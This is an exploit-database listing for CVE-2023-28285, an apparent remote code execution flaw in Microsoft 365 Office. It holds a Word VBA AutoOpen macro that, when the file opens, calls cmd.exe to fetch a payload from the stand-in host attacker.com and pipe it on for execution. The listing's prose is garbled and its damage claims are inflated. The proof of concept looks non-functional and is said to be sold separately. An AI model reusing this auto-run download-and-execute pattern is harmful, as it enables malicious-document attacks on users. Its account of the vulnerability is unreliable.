Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE)

vendor:

Microsoft 365

by:

nu11secur1ty

7.5

CVSS

HIGH

Remote Code Execution (RCE)

CWE

Product Name: Microsoft 365

Affected Version From: Version 2305 Build 16.0.16501.20074

Affected Version To: Unknown

Patch Exists: NO

Related CWE: CVE-2023-28285

CPE: a:microsoft:office:365

Metasploit: https://www.rapid7.com/db/vulnerabilities/office-for-mac-cve-2023-28285/, https://www.rapid7.com/db/vulnerabilities/microsoft-office-cve-2023-28285/

Other Scripts:

Platforms Tested:

2023

Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit – Remote Code Execution (RCE)

The attack itself is carried out locally by a user with authentication to the targeted system. An attacker could exploit the vulnerability by convincing a victim, through social engineering, to download and open a specially crafted file from a website which could lead to a local attack on the victim's computer. The attacker can trick the victim to open a malicious web page by using a malicious 'Word' file for 'Office-365 API'. After the user will open the file to read it, from the API of Office-365, without being asked what it wants to activate, etc, he will activate the code of the malicious server, which he will inject himself, from this malicious server. Emedietly after this click, the attacker can receive very sensitive information! For bank accounts, logs from some sniff attacks, tracking of all the traffic of the victim without stopping, and more malicious stuff, it depends on the scenario and etc.

Mitigation:

Apply the latest security updates provided by Microsoft. Be cautious when opening files or clicking on links from untrusted sources.

Source

Exploit-DB raw data:

## Title: Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 04.17.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/
## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-2023-28285


## Description:
The attack itself is carried out locally by a user with authentication
to the targeted system. An attacker could exploit the vulnerability by
convincing a victim, through social engineering, to download and open
a specially crafted file from a website which could lead to a local
attack on the victim's computer. The attacker can trick the victim to
open a malicious web page by using a malicious `Word` file for
`Office-365 API`. After the user will open the file to read it, from
the API of Office-365, without being asked what it wants to activate,
etc, he will activate the code of the malicious server, which he will
inject himself, from this malicious server. Emedietly after this
click, the attacker can receive very sensitive information! For bank
accounts, logs from some sniff attacks, tracking of all the traffic of
the victim without stopping, and more malicious stuff, it depends on
the scenario and etc.
STATUS: HIGH Vulnerability

[+]Exploit:
The exploit server must be BROADCASTING at the moment when the victim
hit the button of the exploit!

[+]PoC:
```cmd
Sub AutoOpen()
    Call Shell("cmd.exe /S /c" & "curl -s
http://attacker.com/CVE-2023-28285/PoC.debelui | debelui",
vbNormalFocus)
End Sub
```

## FYI:
The PoC has a price and this report will be uploaded with a
description and video of how you can reproduce it only.

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28285)

## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/04/cve-2023-28285-microsoft-office-remote.html)

## Time spend:
01:30:00